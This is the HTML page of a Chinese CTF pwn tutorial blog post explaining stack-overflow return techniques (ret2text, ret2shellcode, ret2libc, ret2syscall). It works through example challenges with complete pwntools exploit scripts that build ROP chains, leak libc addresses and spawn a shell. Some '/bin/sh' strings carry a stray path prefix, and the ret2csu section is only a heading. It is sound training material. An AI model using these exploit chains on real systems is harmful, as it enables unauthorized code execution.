<!DOCTYPE html>
<html lang="zh-Hans">

<!-- Head tag -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="栈…溢出来了…到哪里？">
    

    <!--Author-->
    
        <meta name="author" content="Timlzh">
    

    <!-- Title -->
    
    <title>第三章：栈…溢出来了…到哪里？(ret2xxx) | 我也要成为胖高手 | Tim的杂货铺</title>

    <!-- favicon -->
    
        <link rel="shortcut icon" href="https://timlzh.github.io/melody-favicon.ico">
    

    <!-- Bootstrap Core CSS -->
    <link href="//cdn.jsdelivr.net/npm/bootstrap@3.3.6/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- Valine -->
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>

    <link rel="stylesheet" href="/server-archive/css/darkmode.css">

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/server-archive/css/style.css">


    <!-- Top Menu  -->
    <div class="top_menu">
        
            
            <a href="/server-archive/">Home</a>
            
            <a href="/server-archive/links">Friends</a>
            
            <a href="/server-archive/tags">Tags</a>
            
            <a href="/server-archive/about">About</a>
            
            <a href="/server-archive/">asdfa</a>
            
        
        <a class="darkmode-toggle" href="#" data-toggle="darkmode">
            <i class="fa fa-moon-o"></i>
            <i class="fa fa-sun-o" style="display: none;"></i>
        </a>
    </div>

    <!-- Darkmode -->
    <script src='/server-archive/js/darkmode.js'></script>

    <!-- Custom Fonts -->
    <link href="//cdn.jsdelivr.net/npm/font-awesome@4.5.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href='//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>
    <link href='//fonts.googleapis.com/css?family=Noto+Serif:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>

    <!-- jQuery -->
    <script src="//cdn.bootcss.com/jquery/2.2.1/jquery.min.js"></script>
    <!-- Bootstrap -->
    <script src="//cdn.jsdelivr.net/npm/bootstrap@3.3.6/dist/js/bootstrap.min.js"></script>

    <!-- Highlight -->
    
        <script>
            var lightTheme = "github";
            var darkTheme = "github-dark-dimmed";
        </script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
    

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/server-archive/atom.xml" title="Tim的杂货铺" type="application/atom+xml">
</head>


<body>

    <!-- Content -->
    


<section class="article-container">
    <!-- Back Home -->
    <!-- <a class="nav-back" href="javascript:back()">
    <i class="fa fa-arrow-left"></i>
</a>

<script>
    function back() {
        var home = '/server-archive/'
        if (document.referrer && document.referrer.indexOf(home) > -1) {
            window.history.back();
        } else {
            window.location.href = home;
        }
    }
</script> -->

        <!-- Page Header -->
        <header class="intro-header">
            <div class="container">
                <div class="row">
                    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                        <div class="post-heading">
                            <h1>
                                第三章：栈…溢出来了…到哪里？(ret2xxx)
                            </h1>
                            <div class="subheading">
                                我也要成为胖高手
                            </div>
                            <hr>
                        </div>
                    </div>
                </div>
            </div>
        </header>

        <!-- Post Content -->
        <article>
            <div class="container">
                <div class="row">
                    <!-- Post Main Content -->
                    <div class="post-content col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                        <p>栈…溢出来了…到哪里？</p>
<span id="more"></span>
<h1 id="%E6%A6%82%E5%BF%B5%E5%82%A8%E5%A4%87" tabindex="-1">概念储备</h1>
<h2 id="ret2xxx" tabindex="-1">ret2xxx</h2>
<p>ret2xxx (return to xxx) 是一类典型的栈溢出漏洞题型，其基本原理是利用栈溢出，覆盖返回地址，使程序执行到我们想要的地方。一般来说常见的有ret2text, ret2shellcode, ret2syscall, ret2libc, ret2csu等等。</p>
<h2 id="r.o.p" tabindex="-1">R.O.P</h2>
<p>R.O.P (Return Oriented Programming) 是一种利用程序中已有的代码片段来构造攻击的方法。简单来说，ROP就是将源程序中散落的汇编程序片段（也称gadget）“拼接”在一起，使其能够为攻击者服务。</p>
<h2 id="%E4%BC%A0%E5%8F%82%E6%96%B9%E5%BC%8F" tabindex="-1">传参方式</h2>
<h3 id="32%E4%BD%8D" tabindex="-1">32位</h3>
<p>32位程序的传参方式是栈传参，即将参数从右往左依次压入栈中，然后调用函数，函数从栈中依次弹出参数。</p>
<p>假设调用函数<code>func(1, 2, 3)</code>，则汇编为：</p>
<pre><code class="language-asm">push    3
push    2
push    1
call    func
</code></pre>
<h3 id="64%E4%BD%8D" tabindex="-1">64位</h3>
<p>64位程序的传参方式是寄存器传参，即将参数依次存入寄存器中，然后调用函数，函数从寄存器中依次取出参数。</p>
<p>前六个参数依次存入寄存器<code>rdi, rsi, rdx, rcx, r8, r9</code>中，第七个参数开始压栈。</p>
<p>假设调用函数<code>func(1, 2, 3, 4, 5, 6, 7, 8, 9)</code>，则汇编为：</p>
<pre><code class="language-asm">push    9
push    8
push    7
mov     r9, 6
mov     r8, 5
mov     rcx, 4
mov     rdx, 3
mov     rsi, 2
mov     rdi, 1
call    func
</code></pre>
<h1 id="ret2text" tabindex="-1">ret2text</h1>
<p>ret2text是最简单的一种，其原理是利用栈溢出，覆盖返回地址，使程序执行到某个函数的开头，从而达到执行该函数的目的。</p>
<h2 id="%E4%BE%8B%E9%A2%98" tabindex="-1">例题</h2>
<p>如第二章中提到的 <a href="http://timlzh.com/post/2023-11-30-1#%5Bcnss-recruit-2023%5D-stackoverflow">[CNSS Recruit 2023] StackOverFlow</a> 就是一道最基础的ret2text题，利用栈溢出，覆盖返回地址，使程序执行到准备好的<code>backdoor</code>函数，从而getshell。</p>
<p>这里演示另一个需要利用ROP链自己传参的例题：</p>
<h3 id="%5Bcnss-recruit-2023%5D-unlock-my-heart" tabindex="-1">[CNSS Recruit 2023] Unlock My Heart</h3>
<p>程序启动后调用了一个栈溢出函数：</p>
<p><img src="http://pic.timlzh.com/i/2023/11/30/s5y5t2-2.png" alt="图 0"></p>
<p>有一个后门函数，但是需要传参进去：</p>
<p><img src="http://pic.timlzh.com/i/2023/11/30/s6kriw-2.png" alt="图 1"></p>
<p>还有一个函数可以设置全局变量：</p>
<p><img src="http://pic.timlzh.com/i/2023/11/30/s6nurx-2.png" alt="图 2"></p>
<p>那么思路就很明确了，先设置全局变量为<code>/bin/sh\0</code>，然后调用后门函数，传参为114514和全局变量的地址。</p>
<p>如上面所说，64位程序的前两个参数分别为<code>rdi</code>和<code>rsi</code>，所以我们需要一个ROP链，如<code>pop rdi; pop rsi; ret</code>。这种链怎么找呢？我们一般使用<code>ROPgadget</code>等工具来找。</p>
<pre><code class="language-shell">ROPgadget --binary ./pwn --only &quot;mov|pop|ret&quot;
</code></pre>
<p><img src="http://pic.timlzh.com/i/2023/11/30/s8icjw-2.png" alt="图 3"></p>
<p>于是我们就可以构造payload了。</p>
<pre><code class="language-python"># 溢出到ret
payload = cyclic(0x10 + 8)
# 调用setName
payload += p64(elf.sym['setName'])
# 调用 pop rdi; pop rsi; ret
payload += p64(0x40128c)
# 设置参数
payload += p64(114514) + p64(elf.sym['name'])
# 为了栈平衡，调用 ret
payload += p64(0x40101a)
# 调用 backdoor
payload += p64(elf.sym['B4ckdo0r'])
r.sendlineafter(b'\n', payload)

# 发送 /bin/sh
r.sendlineafter(b'\n', b'/server-archive/bin/sh\x00')
</code></pre>
<h1 id="ret2shellcode" tabindex="-1">ret2shellcode</h1>
<p>ret2shellcode可以说是比较古早的一种利用方式了，其原理是利用栈溢出，覆盖返回地址，使程序执行到我们准备好的shellcode，从而getshell。但是现在的程序基本都有<code>NX</code>之类的保护，无法直接执行shellcode，所以这种方法已经很少用了。</p>
<h2 id="%E4%BE%8B%E9%A2%98-1" tabindex="-1">例题</h2>
<h3 id="%5Bjarvisoj%5D-level1" tabindex="-1">[jarvisoj] level1</h3>
<p><img src="http://pic.timlzh.com/i/2023/11/30/smovr1-2.png" alt="图 4"></p>
<p>保护全关，有shellcode执行的前提条件。</p>
<p><img src="http://pic.timlzh.com/i/2023/11/30/sn7wpp-2.png" alt="图 5"></p>
<p>思路比较清晰，我们直接往buf中写上shellcode，然后栈溢出覆盖返回地址为buf的地址，就可以执行shellcode了。</p>
<pre><code class="language-python">r.recvuntil(b':')
buf_addr = int(r.recvuntil(b'?', drop=True), 16)
log.info('buf_addr: ' + hex(buf_addr))

shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x88 + 4, b'\x00')
payload += p32(buf_addr)
r.sendlineafter(b'\n', payload)

r.interactive()
</code></pre>
<h1 id="ret2libc" tabindex="-1">ret2libc</h1>
<p>ret2libc是一种利用libc中函数的方法。一般来说，linux下的程序都会动态链接libc，所以即使程序本身没有system等函数，我们也可以利用libc中的system函数来getshell。</p>
<p>如果题目没有给你远程对应版本的libc，那么我们可以通过 <a target="_blank" rel="noopener" href="https://libc.nullbyte.cat/">https://libc.nullbyte.cat/</a> 、<a target="_blank" rel="noopener" href="https://libc.blukat.me/">https://libc.blukat.me/</a> 等网站来查找对应版本的libc。</p>
<h2 id="%E4%BE%8B%E9%A2%98-2" tabindex="-1">例题</h2>
<p><a href="/server-archive/files/ret2libc.zip">点击下载附件</a></p>
<p><img src="http://pic.timlzh.com/i/2023/11/30/z78bd0-2.png" alt="图 6"></p>
<p>程序中没有system函数，但是有puts函数，所以我们可以利用puts函数来泄露libc基址，然后计算system函数的地址，再次利用栈溢出，调用system函数，getshell。</p>
<h3 id="%E7%AC%AC%E9%9B%B6%E5%9B%9E%EF%BC%9A%E5%BF%85%E9%9C%80%E7%9A%84rop%E5%92%8C%E5%81%8F%E7%A7%BB" tabindex="-1">第零回：必需的ROP和偏移</h3>
<p>首先，要调用<code>puts</code>，我们需要一个<code>pop rdi; ret</code>的gadget。为了栈平衡，我们还需要一个<code>ret</code>。</p>
<pre><code class="language-shell">ROPgadget --binary ./pwn --only &quot;pop|ret&quot;
</code></pre>
<p><img src="http://pic.timlzh.com/i/2023/11/30/zhbw2k-2.png" alt="图 8"></p>
<p>我们还需要知道libc中<code>puts</code>和<code>system</code>的偏移来计算libc基址和<code>system</code>的地址，这里我们可以通过<code>readelf</code>来查看。<code>/bin/sh</code>字符串的偏移可以通过ROPgadget来查看。</p>
<pre><code class="language-shell">readelf -s libc.so.6 | grep -E &quot;puts|system&quot;
ROPgadget --binary ./libc.so.6 --string &quot;/bin/sh&quot;
</code></pre>
<p><img src="http://pic.timlzh.com/i/2023/11/30/10mzevy-2.png" alt="图 10"></p>
<p>也可以直接在脚本中计算：</p>
<pre><code class="language-python">from pwn import *

libcName = './libc.so.6'
libc = ELF(libcName)
puts_offset = libc.sym['puts']
system_offset = libc.sym['system']
binsh_offset = next(libc.search(b'/server-archive/bin/sh'))
</code></pre>
<h3 id="%E7%AC%AC%E4%B8%80%E5%9B%9E%EF%BC%9Agot%E8%A1%A8%E6%8B%BF%E4%B8%8Blibc%E5%9F%BA%E5%9D%80" tabindex="-1">第一回：got表拿下libc基址</h3>
<p>got表中存放着程序中需要动态链接的函数的地址，我们可以通过泄露got表中的puts函数的地址，计算出libc基址。</p>
<pre><code class="language-python">payload = cyclic(0x70 + 8)
payload += p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(elf.symbols['main']) # 执行完puts再返回漏洞函数
r.sendline(payload)
r.recvuntil('\n')

puts_addr = u64(r.recv(6).ljust(8, b'\x00'))
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/server-archive/bin/sh'))
log.info(f&quot;&quot;&quot;puts_addr: &#123;hex(puts_addr)&#125;
libc_base: &#123;hex(libc_base)&#125;
system_addr: &#123;hex(system_addr)&#125;
binsh_addr: &#123;hex(binsh_addr)&#125;&quot;&quot;&quot;)
</code></pre>
<p><img src="http://pic.timlzh.com/i/2023/11/30/10jw55n-2.png" alt="图 9"></p>
<h3 id="%E7%AC%AC%E4%BA%8C%E5%9B%9E%EF%BC%9Aret2libc%E7%9B%B4%E6%8E%A5getshell" tabindex="-1">第二回：ret2libc直接getshell</h3>
<p>有了libc基址和system函数的地址，我们就可以构造payload了。</p>
<pre><code class="language-python">payload = cyclic(0x70 + 8)
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret) # 栈平衡
payload += p64(system_addr)
r.sendline(payload)
</code></pre>
<h3 id="%E5%AE%8C%E6%95%B4payload" tabindex="-1">完整payload</h3>
<pre><code class="language-python">pop_rdi_ret = 0x0000000000400753
ret = 0x0000000000400509

payload = cyclic(0x70 + 8)
payload += p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(elf.symbols['main'])
r.sendline(payload)
r.recvuntil(b'\n')

puts_addr = u64(r.recv(6).ljust(8, b'\x00'))
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/server-archive/bin/sh'))
log.info(f&quot;&quot;&quot;puts_addr: &#123;hex(puts_addr)&#125;
libc_base: &#123;hex(libc_base)&#125;
system_addr: &#123;hex(system_addr)&#125;
binsh_addr: &#123;hex(binsh_addr)&#125;&quot;&quot;&quot;)

payload = cyclic(0x70 + 8)
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
r.sendline(payload)

r.interactive()
</code></pre>
<h1 id="ret2syscall" tabindex="-1">ret2syscall</h1>
<p><code>ret2syscall</code>是一种利用<code>syscall</code>指令的方法。<code>syscall</code>指令是linux下的系统调用指令，可以直接调用系统函数，而不需要利用<code>system</code>等函数。</p>
<p>下面是<code>syscall</code>的传参方式：</p>
<blockquote>
<p>rax: 系统调用号(如0x3b为execve)<br>
rdi、rsi、rdx、……: 传给系统调用函数的参数(如execve(“/bin/sh”, 0, 0)，则rdi为&quot;/bin/sh&quot;的地址，rsi和rdx为0)</p>
</blockquote>
<h2 id="%E4%BE%8B%E9%A2%98-3" tabindex="-1">例题</h2>
<h3 id="%5Byulin-recruit-2023%5D-basicrop" tabindex="-1">[Yulin Recruit 2023] basicROP</h3>
<p>主要函数：</p>
<p><img src="http://pic.timlzh.com/i/2023/12/05/zevypm-2.png" alt="图 13"></p>
<p><img src="http://pic.timlzh.com/i/2023/12/05/ze8orq-2.png" alt="图 12"></p>
<p>第一个函数看起来复杂，其实是固定了栈的地址。<code>vuln</code>函数则是栈溢出。没看见有<code>system</code>，于是用<code>ROPGadget</code>查了一下，发现有<code>syscall</code>。</p>
<p><img src="http://pic.timlzh.com/i/2023/12/05/zfw3oh-2.png" alt="图 14"></p>
<p>于是我们就可以利用<code>syscall</code>来getshell了。但是我们还需要一个<code>/bin/sh\x00</code>字符串，由于栈的地址是固定的，我们可以在输入的时候把<code>/bin/sh\x00</code>读到变量里（也就是栈上）然后调试一下，找到<code>/bin/sh\x00</code>的地址，然后构造payload。</p>
<pre><code class="language-python">syscall = 0x0000000000401215
pop_rax = 0x0000000000401213
pop_rdi = 0x0000000000401211
pop_rsi = 0x000000000040120f
pop_rdx = 0x000000000040120d
v1_addr = 0xdeacfa0 # 变量v1的地址，也就是/bin/sh\x00的地址
ret = 0x000000000040101a

payload = b'/server-archive/bin/sh\x00'
payload += cyclic(88 - len(payload))
payload += p64(pop_rax) + p64(59) # execve
payload += p64(pop_rdi) + p64(v1_addr)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall) # execve(&quot;/bin/sh&quot;, 0, 0)

r.sendlineafter('name:', payload)
r.interactive()
</code></pre>
<h1 id="ret2csu" tabindex="-1">ret2csu</h1>
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/katex/dist/katex.min.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/markdown-it-texmath/css/texmath.min.css">


                            <!-- Meta -->
                            <div class="post-meta">
                                <hr>
                                <br>
                                <div class="post-tags">
                                    
                                        

<a href="/server-archive/tags/我也要成为胖高手/">#我也要成为胖高手</a> <a href="/server-archive/tags/PWN/">#PWN</a> <a href="/server-archive/tags/CTF/">#CTF</a> <a href="/server-archive/tags/学习/">#学习</a>


                                            
                                </div>
                                <div class="post-date">
                                    
                                        2023-11-30
                                    
                                </div>
                            </div>
                    </div>

                    <!-- Comments -->
                    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                        <!-- Disqus Comments -->

<div id="vcomments" class="comment"></div>
<script>
  new Valine({
    el: '.comment',
    appId: 'TSp33hlPwuAsaq6YiQt7qxqB-gzGzoHsz',
    appKey: '4pv9GKDHCxnThP1EN1u9uYSN',
    placeholder: 'random',
    avatar: '',
    enableQQ: true,
    emojiCDN: '//i0.hdslb.com/bfs/emote/',
    // 表情title和图片映射
    emojiMaps: {
      "tv_doge": "6ea59c827c414b4a2955fe79e0f6fd3dcd515e24.png",
      "tv_亲亲": "a8111ad55953ef5e3be3327ef94eb4a39d535d06.png",
      "tv_偷笑": "bb690d4107620f1c15cff29509db529a73aee261.png",
      "tv_再见": "180129b8ea851044ce71caf55cc8ce44bd4a4fc8.png",
      "tv_冷漠": "b9cbc755c2b3ee43be07ca13de84e5b699a3f101.png",
      "tv_发怒": "34ba3cd204d5b05fec70ce08fa9fa0dd612409ff.png",
      "tv_发财": "34db290afd2963723c6eb3c4560667db7253a21a.png",
      "tv_可爱": "9e55fd9b500ac4b96613539f1ce2f9499e314ed9.png",
      "tv_吐血": "09dd16a7aa59b77baa1155d47484409624470c77.png",
      "tv_呆": "fe1179ebaa191569b0d31cecafe7a2cd1c951c9d.png",
      "tv_呕吐": "9f996894a39e282ccf5e66856af49483f81870f3.png",
      "tv_困": "241ee304e44c0af029adceb294399391e4737ef2.png",
      "tv_坏笑": "1f0b87f731a671079842116e0991c91c2c88645a.png",
      "tv_大佬": "093c1e2c490161aca397afc45573c877cdead616.png",
      "tv_大哭": "23269aeb35f99daee28dda129676f6e9ea87934f.png",
      "tv_委屈": "d04dba7b5465779e9755d2ab6f0a897b9b33bb77.png",
      "tv_害羞": "a37683fb5642fa3ddfc7f4e5525fd13e42a2bdb1.png",
      "tv_尴尬": "7cfa62dafc59798a3d3fb262d421eeeff166cfa4.png",
      "tv_微笑": "70dc5c7b56f93eb61bddba11e28fb1d18fddcd4c.png",
      "tv_思考": "90cf159733e558137ed20aa04d09964436f618a1.png",
      "tv_惊吓": "0d15c7e2ee58e935adc6a7193ee042388adc22af.png",
      "tv_打脸": "56ab10b624063e966bfcb76ea5dc4794d87dfd47.png",
      "tv_抓狂": "fe31c08edad661d63762b04e17b8d5ae3c71a757.png",
      "tv_抠鼻": "c666f55e88d471e51bbd9fab9bb308110824a6eb.png",
      "tv_斜眼笑": "911f987aa8bc1bee12d52aafe62bc41ef4474e6c.png",
      "tv_无奈": "ea8ed89ee9878f2fece2dda0ea8a5dbfe21b5751.png",
      "tv_晕": "5443c22b4d07fb1907ccc610c8e6db254f2461b7.png",
      "tv_流汗": "cead1c351ab8d79e9f369605beb90148db0fbed3.png",
      "tv_流泪": "7e71cde7858f0cd50d74b0264aa26db612a8a167.png",
      "tv_流鼻血": "c32d39db2737f89b904ca32700d140a9241b0767.png",
      "tv_点赞": "f85c354995bd99e28fc76c869bfe42ba6438eff4.png",
      "tv_生气": "26702dcafdab5e8225b43ffd23c94ac1ff932654.png",
      "tv_生病": "8b0ec90e6b86771092a498c54f09fc94621c1900.png",
      "tv_疑问": "0793d949b18d7be716078349c202c15ff166f314.png",
      "tv_白眼": "c1d59f439e379ee50eef488bcb5e5378e5044ea4.png",
      "tv_皱眉": "72ccad6679fea0d14cce648b4d818e09b8ffea2d.png",
      "tv_目瞪口呆": "0b8cb81a68de5d5365212c99375e7ace3e7891b7.png",
      "tv_睡着": "8b196675b53af58264f383c50ad0945048290b33.png",
      "tv_笑哭": "1abc628f6d4f4caf9d0e7800878f4697abbc8273.png",
      "tv_腼腆": "89712c0d4af73e67f89e35cbc518420380a7f6f4.png",
      "tv_色": "61822c7e9aae5da76475e7892534545336b23a6f.png",
      "tv_调侃": "4bc022533ef31544ca0d72c12c808cf4a1cce3e3.png",
      "tv_调皮": "b9c41de8e82dd7a8515ae5e3cb63e898bf245186.png",
      "tv_鄙视": "6e72339f346a692a495b123174b49e4e8e781303.png",
      "tv_闭嘴": "c9e990da7f6e93975e25fd8b70e2e290aa4086ef.png",
      "tv_难过": "87f46748d3f142ebc6586ff58860d0e2fc8263ba.png",
      "tv_馋": "fc7e829b845c43c623c8b490ee3602b7f0e76a31.png",
      "tv_鬼脸": "0ffbbddf8a94d124ca2f54b360bbc04feb6bbfea.png",
      "tv_黑人问号": "45821a01f51bc867da9edbaa2e070410819a95b2.png",
      "tv_鼓掌": "1d21793f96ef4e6f48b23e53e3b9e42da833a0f6.png"
      // ... 更多表情
    }
  })
  if('random' == 'random'){
    var veditor = document.getElementById("veditor");
    fetch('https://v1.hitokoto.cn')
        .then(response => response.json())
        .then(data => {
        veditor.placeholder = '『' + data.hitokoto + '』' + '\n\n\n' + 'From  ' + data.from;
        })
        .catch(console.error)
  }
</script>

                    </div>
                </div>
            </div>
        </article>
</section>

<!-- Image viewer-->

    
    <!-- Custom picture view-->
    <link href="/server-archive/css/viewer.min.css" rel="stylesheet" />
    <script
      src="/server-archive/js/viewer.min.js"
      type="text/javascript"
      charset="utf-8"
    ></script>
    
    <script type="text/javascript">
      // set image viewer
      Viewer.setDefaults({
        zoomRatio: [0.5],
        navbar: false,
        toolbar: false,
        button: false,
        title: [2, (image, imageData) => `${image.alt}`],
        show: function() {
          this.viewer.zoomTo(0.5);
        }
      });
      var imageList = document.getElementsByTagName("img");
      Array.prototype.forEach.call(imageList, element => {
        var viewer = new Viewer(element);
      });
    </script>

    


<!-- TOC -->
<!-- 
    <aside id="article-toc" role="navigation" class="fixed">
        <div id="article-toc-inner">
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A6%82%E5%BF%B5%E5%82%A8%E5%A4%87"><span class="toc-text">概念储备</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2xxx"><span class="toc-text">ret2xxx</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#r.o.p"><span class="toc-text">R.O.P</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%A0%E5%8F%82%E6%96%B9%E5%BC%8F"><span class="toc-text">传参方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#32%E4%BD%8D"><span class="toc-text">32位</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#64%E4%BD%8D"><span class="toc-text">64位</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2text"><span class="toc-text">ret2text</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-text">例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%5Bcnss-recruit-2023%5D-unlock-my-heart"><span class="toc-text">[CNSS Recruit 2023] Unlock My Heart</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2shellcode"><span class="toc-text">ret2shellcode</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-1"><span class="toc-text">例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%5Bjarvisoj%5D-level1"><span class="toc-text">[jarvisoj] level1</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2libc"><span class="toc-text">ret2libc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-2"><span class="toc-text">例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E9%9B%B6%E5%9B%9E%EF%BC%9A%E5%BF%85%E9%9C%80%E7%9A%84rop%E5%92%8C%E5%81%8F%E7%A7%BB"><span class="toc-text">第零回：必需的ROP和偏移</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E5%9B%9E%EF%BC%9Agot%E8%A1%A8%E6%8B%BF%E4%B8%8Blibc%E5%9F%BA%E5%9D%80"><span class="toc-text">第一回：got表拿下libc基址</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E5%9B%9E%EF%BC%9Aret2libc%E7%9B%B4%E6%8E%A5getshell"><span class="toc-text">第二回：ret2libc直接getshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4payload"><span class="toc-text">完整payload</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2syscall"><span class="toc-text">ret2syscall</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-3"><span class="toc-text">例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%5Byulin-recruit-2023%5D-basicrop"><span class="toc-text">[Yulin Recruit 2023] basicROP</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2csu"><span class="toc-text">ret2csu</span></a></li></ol>
        </div>
    </aside>
 -->


    <script>
        hljs.highlightAll();
    </script>

    <!-- Scripts -->
    <script type="text/javascript">
    console.log("© Timlzh 🙋 2022-" + new Date().getFullYear());
    console.log("Welcome to my blog: https://timlzh.com");
</script>
  
    <!-- Google Analytics -->
    

    <!-- Service Worker -->
    <!-- if using service worker -->

    
    <!-- Go Top -->
    <a class="go-top">
    <i class="fa fa-arrow-up"></i>
</a>

<script type="text/javascript">
    if ($(window).scrollTop() <= 100) {
        $(".go-top").hide();
    }
    
    $(function () {
        $(window).scroll(function () {
            if ($(window).scrollTop() > 100) {
                $(".go-top").fadeIn(500);
            } else {
                $(".go-top").fadeOut(500);
            }
        });
        $(".go-top").click(function () {
            $('body,html').animate({scrollTop: 0}, 500);
            return false;
        });
    });
</script>
</body>

<footer>
    
    
    
        <div class="beian">
            <a href="http://www.beian.miit.gov.cn" target="_blank">浙ICP备2022036129号-2</a>
        </div>
    

</footer>

</html>